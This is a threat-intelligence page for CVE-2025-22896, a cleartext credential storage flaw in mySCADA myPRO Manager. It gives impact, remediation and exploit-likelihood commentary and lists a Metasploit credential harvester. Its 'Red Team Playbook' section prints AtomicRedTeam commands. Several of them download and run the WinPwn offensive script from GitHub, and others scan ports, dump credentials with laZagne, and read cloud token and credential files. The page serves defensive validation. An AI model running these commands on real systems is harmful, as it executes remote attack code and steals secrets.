CVE-2025-22896
Overview
The vulnerability in mySCADA myPRO Manager is an information exposure flaw caused by the storage of credentials in cleartext within the application. This insecure storage mechanism affects the credential management component, allowing sensitive authentication data to be accessed without encryption or protection. The root cause lies in the absence of cryptographic safeguards for stored credentials, violating secure storage best practices.
Vulnerability Description
mySCADA myPRO Manager stores credentials in cleartext, which could allow an attacker to obtain sensitive information.
Impact
An unauthenticated attacker with access to the system’s file storage can extract plaintext credentials, enabling unauthorized access to the mySCADA myPRO Manager environment. This can lead to compromise of sensitive operational data and potential lateral movement within the industrial control system network. The vulnerability requires no user interaction or privileges (CVSS vector AV:N/AC:L/PR:N/UI:N), increasing the likelihood of exploitation in network-exposed environments.
Solution
According to the ICS-CERT advisory ICSA-25-044-16 and vendor resources at https://www.myscada.org/downloads/mySCADAPROManager/, users should upgrade to the latest mySCADA myPRO Manager version that implements encrypted credential storage. The vendor provides updated releases that remediate this issue by securing stored credentials. Detailed patch instructions and contact information for support are available on the vendor’s official website.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with mySCADA myPRO Manager arises from the insecure storage of credentials in cleartext. This fundamental flaw in the software's design allows sensitive information, such as usernames and passwords, to be easily accessible to unauthorized users. When credentials are stored without encryption, they can be exposed through various means, including unauthorized access to the file system or memory dumps. This lack of proper security measures significantly increases the risk of credential theft, enabling attackers to gain unauthorized access to critical systems and data.
Attack vectors for exploiting this vulnerability are numerous and varied. An attacker with local access to the affected system could directly read the stored credentials, while remote attackers might exploit other vulnerabilities in the system to gain access. For example, if the myPRO Manager is deployed in a networked environment, an attacker could leverage network vulnerabilities or social engineering tactics to gain initial access. Once inside the system, they could navigate to the location where the credentials are stored, thus compromising the integrity and confidentiality of the entire system. Furthermore, if the compromised credentials have administrative privileges, the attacker could escalate their access, leading to a complete takeover of the system.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on mySCADA myPRO Manager for critical infrastructure management. The exposure of sensitive credentials can lead to unauthorized access to operational technology (OT) systems, potentially resulting in service disruptions, data breaches, and financial losses. For industries such as manufacturing, energy, and utilities, the consequences can be dire, including production downtime, regulatory fines, and damage to reputation. The high CVSS score of 9.2 reflects the severity of the risk, indicating that organizations must prioritize addressing this vulnerability to safeguard their assets and operations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security audits and vulnerability assessments should be conducted to identify instances where credentials are stored in cleartext. Employing tools that can scan for insecure storage practices will help organizations locate and remediate these issues. Additionally, organizations should enforce best practices for credential management, such as using strong encryption methods for storing sensitive information and implementing access controls to limit who can view or modify these credentials. Training employees on security awareness and the importance of safeguarding sensitive information will further bolster defenses against potential exploitation.
In conclusion, the vulnerability associated with the mySCADA myPRO Manager poses a serious threat to organizations that utilize this software. The cleartext storage of credentials creates a critical security risk that can be exploited through various attack vectors, leading to significant real-world consequences. By adopting robust detection and mitigation strategies, organizations can protect themselves from the potential fallout of this vulnerability and enhance their overall cybersecurity posture. It is imperative for businesses to remain vigilant and proactive in addressing such vulnerabilities to maintain the integrity and security of their operational environments.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-22896, rising by approximately 12.6% to place this vulnerability near the 97th percentile of exploit likelihood. This shift reflects a growing confidence in the exploitability of the cleartext credential storage flaw within mySCADA myPRO Manager, corroborated by the continued availability of a Metasploit auxiliary module that facilitates credential harvesting without proper authentication. Our telemetry indicates that while the overall exploitation trend remains stable, the elevated EPSS score signals heightened interest from threat actors, potentially increasing the risk of targeted attacks against organizations using affected versions. This development underscores an elevated threat level, as adversaries may leverage this vulnerability in conjunction with related authentication bypass flaws to gain unauthorized access and exfiltrate sensitive credentials. Consequently, defenders should recognize that the window for opportunistic exploitation is expanding, warranting increased vigilance despite the absence of a rapid surge in active attacks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Myscada | Mypro | All |
cpe:2.3:a:myscada:mypro:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)
auxiliary/admin/scada/mypro_mgr_creds
|
Michael Heinzl | Unknown | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-37 | Retrieve Embedded Sensitive Data |
30%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-22896 |
| cisa.gov |
GitHub CVE
|
https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16 |
| myscada.org |
GitHub CVE
|
https://www.myscada.org/downloads/mySCADAPROManager/ |
| myscada.org |
GitHub CVE
|
https://www.myscada.org/contacts/ |